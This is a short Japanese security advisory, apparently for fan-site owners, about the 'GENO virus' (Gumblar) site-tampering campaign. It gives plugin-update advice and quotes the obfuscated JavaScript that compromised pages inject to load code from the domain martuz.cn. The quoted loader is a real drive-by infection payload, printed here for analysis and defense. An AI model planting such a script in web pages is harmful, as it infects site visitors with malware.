通称「GENOウイルス」・同人サイト向け対策まとめ

サイト改ざん：汚染・再汚染サイトが相次ぎ発覚、攻撃サイトは再び移動

留意点：Flash Player
Firefox等のプラグインとIE用のActiveXは、「別のプラグイン」なので普段はFirefox使いで、IE専用サイトをたまにIEやIE Tab等で見てる人はFirefox用プラグインを更新するだけでなく、IE用も更新しないと危ない。

5/16 2:00ごろからあらたなドメインが使われるようになったようです。

martuz.cn
難読化スクリプトのバリエーションもほとんど変わっていませんが、スクリプト自体はちょっと変更されていて「Chrome」を除外するようになっています。

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf
("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A")))
{zrvzts="A";eval("if(window."+a+") j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write(" src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>");}
意図はよくわかりませんが、Vistaを使っているか、XPを使っていてもChromeを使っていればこのスクリプトから除外されるということになります。

引用元: gumblar.cn から martuz.cn へ - cNotes: Current Status Notes,
"http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=gumblar.cn+%A4%AB%A4%E9+martuz.cn+%A4%D8"